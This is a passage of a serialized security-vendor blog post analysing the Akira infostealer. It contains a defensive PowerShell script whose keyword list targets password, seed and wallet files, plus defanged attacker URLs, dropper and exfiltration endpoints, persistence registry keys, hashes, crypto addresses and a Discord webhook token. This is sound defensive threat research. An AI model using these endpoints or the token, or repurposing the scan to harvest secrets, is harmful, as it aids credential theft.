\"$env:USERPROFILE\\OneDrive\"\n",[102,15608,15609],{"class":104,"line":9097},[102,15610,9238],{},[102,15612,15613],{"class":104,"line":9103},[102,15614,15615],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[102,15617,15618],{"class":104,"line":9770},[102,15619,15620],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[102,15622,15623],{"class":104,"line":9775},[102,15624,15625],{},"$maxSize    = 
2MB\n",[102,15627,15628],{"class":104,"line":9780},[102,15629,7846],{"emptyLinePlaceholder":2180},[102,15631,15632],{"class":104,"line":9785},[102,15633,15572],{},[102,15635,15636],{"class":104,"line":9791},[102,15637,15638],{},"# 2. Scan and Collect Matches\n",[102,15640,15641],{"class":104,"line":9796},[102,15642,15572],{},[102,15644,15645],{"class":104,"line":9801},[102,15646,15647],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[102,15649,15650],{"class":104,"line":9806},[102,15651,7846],{"emptyLinePlaceholder":2180},[102,15653,15654],{"class":104,"line":9811},[102,15655,15656],{},"foreach ($folder in $scanFolders) {\n",[102,15658,15659],{"class":104,"line":9816},[102,15660,15661],{},"    if (-not (Test-Path $folder)) { continue }\n",[102,15663,15664],{"class":104,"line":9821},[102,15665,15666],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[102,15668,15669],{"class":104,"line":9827},[102,15670,15671],{},"        # 2.1 Extension filter\n",[102,15673,15674],{"class":104,"line":9833},[102,15675,15676],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[102,15678,15679],{"class":104,"line":9839},[102,15680,15681],{},"        # 2.2 Size filter\n",[102,15683,15684],{"class":104,"line":9844},[102,15685,15686],{},"        if ($_.Length -gt $maxSize) { return }\n",[102,15688,15689],{"class":104,"line":9849},[102,15690,7846],{"emptyLinePlaceholder":2180},[102,15692,15693],{"class":104,"line":9854},[102,15694,15695],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[102,15697,15698],{"class":104,"line":9859},[102,15699,15700],{},"        $hit = $null\n",[102,15702,15703],{"class":104,"line":9865},[102,15704,15705],{},"        foreach ($kw in $keywords) {\n",[102,15707,15708],{"class":104,"line":9870},[102,15709,15710],{},"            if ($_.Name.ToLower().Contains($kw)) 
{\n",[102,15712,15713],{"class":104,"line":9875},[102,15714,15715],{},"                $hit = $kw\n",[102,15717,15718],{"class":104,"line":9880},[102,15719,15720],{},"                break\n",[102,15722,15723],{"class":104,"line":9885},[102,15724,15725],{},"            }\n",[102,15727,15728],{"class":104,"line":9890},[102,15729,15730],{},"        }\n",[102,15732,15733],{"class":104,"line":9895},[102,15734,15735],{},"        if (-not $hit) { return }\n",[102,15737,15738],{"class":104,"line":9901},[102,15739,7846],{"emptyLinePlaceholder":2180},[102,15741,15742],{"class":104,"line":9907},[102,15743,15744],{},"        # 2.4 Build relative path\n",[102,15746,15747],{"class":104,"line":9913},[102,15748,15749],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[102,15751,15752],{"class":104,"line":9919},[102,15753,7846],{"emptyLinePlaceholder":2180},[102,15755,15756],{"class":104,"line":9924},[102,15757,15758],{},"        # 2.5 Collect\n",[102,15760,15761],{"class":104,"line":9929},[102,15762,15763],{},"        $matches.Add([PSCustomObject]@{\n",[102,15765,15766],{"class":104,"line":9935},[102,15767,15768],{},"            FileName    = $_.Name\n",[102,15770,15771],{"class":104,"line":9941},[102,15772,15773],{},"            Location    = $rel\n",[102,15775,15776],{"class":104,"line":9947},[102,15777,15778],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[102,15780,15781],{"class":104,"line":9953},[102,15782,15783],{},"            Keyword     = $hit\n",[102,15785,15786],{"class":104,"line":9958},[102,15787,15788],{},"        })\n",[102,15790,15791],{"class":104,"line":9963},[102,15792,15793],{},"    }\n",[102,15795,15796],{"class":104,"line":9969},[102,15797,6410],{},[102,15799,15800],{"class":104,"line":9974},[102,15801,7846],{"emptyLinePlaceholder":2180},[102,15803,15804],{"class":104,"line":9979},[102,15805,15572],{},[102,15807,15808],{"class":104,"line":9985},[102,15809,15810],{},"# 3. 
Display Results\n",[102,15812,15813],{"class":104,"line":9991},[102,15814,15572],{},[102,15816,15817],{"class":104,"line":9997},[102,15818,15819],{},"clear\n",[102,15821,15822],{"class":104,"line":10002},[102,15823,15824],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[102,15826,15827],{"class":104,"line":10008},[102,15828,15829],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[102,15831,15832],{"class":104,"line":10014},[102,15833,7846],{"emptyLinePlaceholder":2180},[102,15835,15836],{"class":104,"line":10019},[102,15837,15838],{},"if ($matches.Count -gt 0) {\n",[102,15840,15841],{"class":104,"line":10025},[102,15842,15843],{},"    $matches |\n",[102,15845,15846],{"class":104,"line":10031},[102,15847,15848],{},"        Sort-Object Location, FileName |\n",[102,15850,15851],{"class":104,"line":10036},[102,15852,15853],{},"        Format-Table -AutoSize `\n",[102,15855,15856],{"class":104,"line":10041},[102,15857,15858],{},"            @{Label='File';       Expression={$_.FileName}},\n",[102,15860,15861],{"class":104,"line":10046},[102,15862,15863],{},"            @{Label='Location';   Expression={$_.Location}},\n",[102,15865,15866],{"class":104,"line":10052},[102,15867,15868],{},"            @{Label='Size (KB)';  Expression={$_. 
'Size (KB)'}},\n",[102,15870,15872],{"class":104,"line":15871},79,[102,15873,15874],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[102,15876,15878],{"class":104,"line":15877},80,[102,15879,7846],{"emptyLinePlaceholder":2180},[102,15881,15883],{"class":104,"line":15882},81,[102,15884,15885],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[102,15887,15889],{"class":104,"line":15888},82,[102,15890,6410],{},[102,15892,15894],{"class":104,"line":15893},83,[102,15895,15896],{},"else {\n",[102,15898,15900],{"class":104,"line":15899},84,[102,15901,15902],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[102,15904,15906],{"class":104,"line":15905},85,[102,15907,6410],{},[102,15909,15911],{"class":104,"line":15910},86,[102,15912,7846],{"emptyLinePlaceholder":2180},[102,15914,15916],{"class":104,"line":15915},87,[102,15917,15918],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[102,15920,15922],{"class":104,"line":15921},88,[102,15923,15924],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[52,15926],{"className":15927},[4854,4855],[25,15929,15931],{"id":15930},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[12,15933,31],{},[12,15935,15936,15937],{},"Most security operations centers stop at containment.\n",[251,15938,15939],{},"We don’t.",[12,15941,15942],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[12,15944,15945],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. 
Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[12,15947,15948,15949,1014],{},"This philosophy is why we built the ",[251,15950,15951],{},"Akira Compromise Reporter",[12,15953,15954],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[1255,15956,15957,15960,15963],{},[1258,15958,15959],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[1258,15961,15962],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[1258,15964,15965],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[12,15967,15968],{},[2772,15969],{"alt":15970,"src":15971},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[12,15973,15974],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. Cybersecurity, done right, isn’t about simply reacting to incidents; it’s about understanding, adapting, and always staying one step ahead.",[12,15976,15977],{},[251,15978,15979],{},"That’s the glueckkanja CSOC difference.",[25,15981,15983],{"id":15982},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[12,15985,31],{},[12,15987,15988],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. 
All URLs are deliberately obfuscated to prevent accidental clicks.",[12,15990,15991],{},[251,15992,15993],{},"Abbreviations:",[1255,15995,15996,16002],{},[1258,15997,15998,16001],{},[251,15999,16000],{},"TG:"," Telegram reporting channel",[1258,16003,16004,16007],{},[251,16005,16006],{},"Alt:"," Alternate (fallback) endpoint",[41,16009,16011],{"id":16010},"_1-domains-urls","1. Domains & URLs",[12,16013,47],{},[417,16015,420,16017],{"className":16016,"style":8673},[15091],[438,16018,16019,420,16031,420,16044,420,16057,420,16070,420,16083,420,16096,420,16109,420,16125,420,16141,420,16154,420,16167,420,16180,420,16193,420,16206,420,16219,420,16232,420,16245,420,16258,420,16271,420,16285,420,16298],{},[426,16020,424,16021,424,16025,424,16029,420],{},[430,16022,16024],{"style":16023},"text-align: left; width: 18%;","Category",[430,16026,16028],{"style":16027},"text-align: left; width: 52%;","Obfuscated URL",[430,16030,8848],{"style":8841},[426,16032,424,16033,424,16036,424,16041,420],{},[443,16034,16035],{},"Primary Injection",[443,16037,16038],{},[63,16039,16040],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[443,16042,16043],{},"Initial attacker webhook endpoint",[426,16045,424,16046,424,16049,424,16054,420],{"style":8697},[443,16047,16048],{},"Fallback Injection",[443,16050,16051],{},[63,16052,16053],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[443,16055,16056],{},"Alternate injector endpoint",[426,16058,424,16059,424,16062,424,16067,420],{},[443,16060,16061],{},"Error Reporting (TG)",[443,16063,16064],{},[63,16065,16066],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[443,16068,16069],{},"Telegram error/log reporting URL",[426,16071,424,16072,424,16075,424,16080,420],{"style":8697},[443,16073,16074],{},"Error Reporting (Alt)",[443,16076,16077],{},[63,16078,16079],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[443,16081,16082],{},"Alternate error/log reporting 
URL",[426,16084,424,16085,424,16088,424,16093,420],{},[443,16086,16087],{},"Vanity Bot (TG)",[443,16089,16090],{},[63,16091,16092],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[443,16094,16095],{},"Vanity address notification endpoint",[426,16097,424,16098,424,16101,424,16106,420],{"style":8697},[443,16099,16100],{},"Vanity Bot (Alt)",[443,16102,16103],{},[63,16104,16105],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[443,16107,16108],{},"Alternate vanity notification endpoint",[426,16110,424,16111,424,16114,424,16119,420],{},[443,16112,16113],{},"Exodus Injection",[443,16115,16116],{},[63,16117,16118],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[443,16120,16121,16122,16124],{},"Electron ",[63,16123,8579],{}," app module",[426,16126,424,16127,424,16130,424,16135,420],{"style":8697},[443,16128,16129],{},"Atomic Injection",[443,16131,16132],{},[63,16133,16134],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[443,16136,16121,16137,16140],{},[63,16138,16139],{},"AtomicWallet"," module",[426,16142,424,16143,424,16146,424,16151,420],{},[443,16144,16145],{},"Updater Download",[443,16147,16148],{},[63,16149,16150],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[443,16152,16153],{},"Persistence dropper executable",[426,16155,424,16156,424,16159,424,16164,420],{"style":8697},[443,16157,16158],{},"Gofile API List",[443,16160,16161],{},[63,16162,16163],{},"https[:]//api.gofile[.]io/servers",[443,16165,16166],{},"Retrieves best GoFile upload server",[426,16168,424,16169,424,16172,424,16177,420],{},[443,16170,16171],{},"Discord Token Check",[443,16173,16174],{},[63,16175,16176],{},"https[:]//discordapp[.]com/api/v9/users/@me",[443,16178,16179],{},"Validates stolen Discord token",[426,16181,424,16182,424,16185,424,16190,420],{"style":8697},[443,16183,16184],{},"Discord Billing 
Info",[443,16186,16187],{},[63,16188,16189],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[443,16191,16192],{},"Retrieves billing methods",[426,16194,424,16195,424,16198,424,16203,420],{},[443,16196,16197],{},"Google OAuth Replay",[443,16199,16200],{},[63,16201,16202],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[443,16204,16205],{},"Replays stolen Google session tokens",[426,16207,424,16208,424,16211,424,16216,420],{"style":8697},[443,16209,16210],{},"IP Check (hosting)",[443,16212,16213],{},[63,16214,16215],{},"http[:]//ip-api[.]com/line/?fields=hosting",[443,16217,16218],{},"Hosting environment detection",[426,16220,424,16221,424,16224,424,16229,420],{},[443,16222,16223],{},"IP Lookup (geo)",[443,16225,16226],{},[63,16227,16228],{},"http[:]//ip-api[.]com/json/{ip}",[443,16230,16231],{},"Geolocation by IP",[426,16233,424,16234,424,16237,424,16242,420],{"style":8697},[443,16235,16236],{},"Public IP Retrieval",[443,16238,16239],{},[63,16240,16241],{},"https[:]//api[.]ipify[.]org",[443,16243,16244],{},"Fetches external IP address",[426,16246,424,16247,424,16250,424,16255,420],{},[443,16248,16249],{},"File.io Upload",[443,16251,16252],{},[63,16253,16254],{},"https[:]//file[.]io/",[443,16256,16257],{},"Secondary exfiltration channel",[426,16259,424,16260,424,16263,424,16268,420],{"style":8697},[443,16261,16262],{},"Oshi.at Upload",[443,16264,16265],{},[63,16266,16267],{},"http[:]//oshi[.]at/",[443,16269,16270],{},"Tertiary exfiltration channel",[426,16272,424,16273,424,16276,424,16282,420],{},[443,16274,16275],{},"JS Dropper Primary",[443,16277,16278],{},[2630,16279,16281],{"href":16280,"target":2633},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[443,16283,16284],{},"Remote reference to actual ZIP URL",[426,16286,424,16287,424,16290,424,16295,420],{"style":8697},[443,16288,16289],{},"JS Dropper Fallback 
1",[443,16291,16292],{},[2630,16293,16294],{"href":7594,"target":2633},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[443,16296,16297],{},"Alternative payload ZIP",[426,16299,424,16300,424,16303,424,16308,420],{},[443,16301,16302],{},"JS Dropper Fallback 2",[443,16304,16305],{},[2630,16306,16307],{"href":7599,"target":2633},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[443,16309,16310],{},"Secondary fallback payload ZIP",[52,16312],{"className":16313},[4854,4855],[41,16315,16317],{"id":16316},"_2-cryptocurrency-addresses","2. Cryptocurrency Addresses",[12,16319,47],{},[417,16321,420,16323],{"className":16322,"style":8673},[15091],[438,16324,16325,420,16333,420,16343,420,16353,420,16363,420,16372,420,16382,420,16392,420,16402,420,16412,420,16422],{},[426,16326,424,16327,424,16330,420],{},[430,16328,16329],{"style":15102},"Currency",[430,16331,16332],{"style":8841},"Address",[426,16334,424,16335,424,16338,420],{},[443,16336,16337],{},"BTC",[443,16339,16340],{},[63,16341,16342],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[426,16344,424,16345,424,16348,420],{"style":8697},[443,16346,16347],{},"ETH",[443,16349,16350],{},[63,16351,16352],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[426,16354,424,16355,424,16358,420],{},[443,16356,16357],{},"DOGE",[443,16359,16360],{},[63,16361,16362],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[426,16364,424,16365,424,16368,420],{"style":8697},[443,16366,16367],{},"LTC",[443,16369,16370],{},[63,16371,15132],{},[426,16373,424,16374,424,16377,420],{},[443,16375,16376],{},"XMR",[443,16378,16379],{},[63,16380,16381],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[426,16383,424,16384,424,16387,420],{"style":8697},[443,16385,16386],{},"BCH",[443,16388,16389],{},[63,16390,16391],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[426,16393,424,16394,424,16397,420],{},[443,16395,16396],{},"DASH",[443,16398,16399],{},[63,16400,16401],{},"XpeiSH1MfQYeehTf
xosYHyTHzbgu2LNsG1",[426,16403,424,16404,424,16407,420],{"style":8697},[443,16405,16406],{},"TRX",[443,16408,16409],{},[63,16410,16411],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[426,16413,424,16414,424,16417,420],{},[443,16415,16416],{},"XRP",[443,16418,16419],{},[63,16420,16421],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[426,16423,424,16424,424,16427,420],{"style":8697},[443,16425,16426],{},"XLM",[443,16428,16429],{},[63,16430,16431],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[52,16433],{"className":16434},[4854,4855],[41,16436,16438],{"id":16437},"_3-registry-keys-paths","3. Registry Keys / Paths",[12,16440,47],{},[417,16442,420,16444],{"className":16443,"style":8673},[15091],[438,16445,16446,420,16453,420,16463,420,16473,420,16486],{},[426,16447,424,16448,424,16451,420],{},[430,16449,5662],{"style":16450},"text-align: left; width: 60%;",[430,16452,5204],{"style":8841},[426,16454,424,16455,424,16460,420],{},[443,16456,16457],{},[63,16458,16459],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[443,16461,16462],{},"Checks for virtual GPU driver signature",[426,16464,424,16465,424,16470,420],{"style":8697},[443,16466,16467],{},[63,16468,16469],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[443,16471,16472],{},"Checks for virtual GPU provider name",[426,16474,424,16475,424,16483,420],{},[443,16476,16477,16480,16481,1289],{},[63,16478,16479],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[251,16482,5673],{},[443,16484,16485],{},"Persistence via Run key (Updater.exe)",[426,16487,424,16488,424,16492,420],{"style":8697},[443,16489,16490],{},[63,16491,5681],{},[443,16493,16494],{},"Persistence Executable",[52,16496],{"className":16497},[4854,4855],[41,16499,16501],{"id":16500},"_5-files-hashes","5. 
Files & Hashes",[12,16503,47],{},[417,16505,420,16507],{"className":16506,"style":8673},[15091],[438,16508,16509,420,16520,420,16532,420,16544,420,16557,420,16569,420,16581,420,16593,420,16605,420,16618,420,16630,420,16643,420,16655],{},[426,16510,424,16511,424,16513,424,16517,420],{},[430,16512,15435],{"style":16023},[430,16514,16516],{"style":16515},"text-align: left; width: 62%;","SHA256",[430,16518,16519],{"style":8841},"Size (bytes)",[426,16521,424,16522,424,16524,424,16529,420],{},[443,16523,5831],{},[443,16525,16526],{},[63,16527,16528],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[443,16530,16531],{},"63936274",[426,16533,424,16534,424,16536,424,16541,420],{"style":8697},[443,16535,4618],{},[443,16537,16538],{},[63,16539,16540],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[443,16542,16543],{},"162036224",[426,16545,424,16546,424,16549,424,16554,420],{},[443,16547,16548],{},"jscrypter.js",[443,16550,16551],{},[63,16552,16553],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[443,16555,16556],{},"1429",[426,16558,424,16559,424,16561,424,16566,420],{"style":8697},[443,16560,6816],{},[443,16562,16563],{},[63,16564,16565],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[443,16567,16568],{},"30138",[426,16570,424,16571,424,16573,424,16578,420],{},[443,16572,6813],{},[443,16574,16575],{},[63,16576,16577],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[443,16579,16580],{},"7155",[426,16582,424,16583,424,16585,424,16590,420],{"style":8697},[443,16584,6746],{},[443,16586,16587],{},[63,16588,16589],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[443,16591,16592],{},"211",[426,16594,424,16595,424,16597,424,16602,420],{},[443,16596,4622],{},[443,16598,16599],{},[63,16600,16601],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[443,16603,16604],{},"205210",[426,16606,424,16607,424,16610,424,16615,420],{"style":8697
},[443,16608,16609],{},"exodus.asar",[443,16611,16612],{},[63,16613,16614],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[443,16616,16617],{},"132486332",[426,16619,424,16620,424,16622,424,16627,420],{},[443,16621,5890],{},[443,16623,16624],{},[63,16625,16626],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[443,16628,16629],{},"28454",[426,16631,424,16632,424,16635,424,16640,420],{"style":8697},[443,16633,16634],{},"download.dat",[443,16636,16637],{},[63,16638,16639],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[443,16641,16642],{},"21142",[426,16644,424,16645,424,16647,424,16652,420],{},[443,16646,6874],{},[443,16648,16649],{},[63,16650,16651],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[443,16653,16654],{},"32375391",[426,16656,424,16657,424,16659,424,16664,420],{"style":8697},[443,16658,4614],{},[443,16660,16661],{},[63,16662,16663],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[443,16665,16666],{},"37652937",[52,16668],{"className":16669},[4854,4855],[41,16671,16673],{"id":16672},"_5-discord-telegram-identifier","5. 
Discord & Telegram Identifier",[12,16675,47],{},[417,16677,420,16679],{"className":16678,"style":8673},[15091],[438,16680,16681,420,16687,420,16697,420,16707],{},[426,16682,424,16683,424,16685,420],{},[430,16684,16024],{"style":10293},[430,16686,5421],{"style":8841},[426,16688,424,16689,424,16692,420],{},[443,16690,16691],{},"Discord Webhook ID",[443,16693,16694],{},[63,16695,16696],{},"1226766972675428372",[426,16698,424,16699,424,16702,420],{"style":8697},[443,16700,16701],{},"Discord Webhook Token",[443,16703,16704],{},[63,16705,16706],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[426,16708,424,16709,424,16712,420],{},[443,16710,16711],{},"Telegram ID",[443,16713,16714],{},[63,16715,16716],{},"5035121855",[52,16718],{"className":16719},[4854,4855],[25,16721,16723],{"id":16722},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[12,16725,31],{},[12,16727,16728],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[12,16730,16731],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[12,16733,16734],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. 
Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[12,16736,16737],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[12,16739,16740],{},"Take the next step in securing your organization's digital assets.",[12,16742,16743],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[12,16745,16746],{},[251,16747,16748],{},"Empower your defense with glueckkanja CSOC.",[25,16750,16752],{"id":16751},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[12,16754,31],{},[12,16756,16757],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. We publish this in good faith and with the intent to contribute to the broader security community.",[12,16759,16760],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or operational use of any such code is explicitly discouraged. 
Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[12,16762,16763],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[12,16765,16766],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[12,16768,16769],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. 
When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[12,16771,16772],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[2126,16774,16775],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki 
.s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":65,"searchDepth":111,"depth":111,"links":16777},[16778,16779,16780,16781,16792,16793,16794,16795,16796,16797,16798,16799,16801,16802,16803,16804,16805,16806,16807,16808,16809,16812,16820,16821,16822,16828,16846,16864,16865,16866,16867,16875,16882,16889,16898,16905,16906,16907,16908,16909,16910,16911,16912,16913,16914,16915,16916,16917,16918,16919,16920],{"id":4745,"depth":111,"text":4746},{"id":4793,"depth":111,"text":4794},{"id":4813,"depth":111,"text":4814},{"id":4867,"depth":111,"text":4868,"children":16782},[16783,16784,16786,16788,16790],{"id":4887,"depth":329,"text":4888},{"id":4939,"depth":329,"text":16785},"2.1.2 Updater.exe – Initial Loader",{"id":5044,"depth":329,"text":16787},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":5162,"depth":329,"text":16789},"2.1.4 cmd.exe & PowerShell Relay",{"id":5272,"depth":329,"text":16791},"2.1.5 python.exe with astor.py",{"id":5406,"depth":111,"text":5407},{"id":5489,"depth":111,"text":5490},{"id":5567,"depth":111,"text":5568},{"id":5646,"depth":111,"text":5647},{"id":5713,"depth":111,"text":5714},{"id":5793,"depth":111,"text":5794},{"id":5902,"depth":111,"text":5903},{"id":6019,"depth":111,"text":16800},"4.2 AMSI Bypass Technique (Class: 
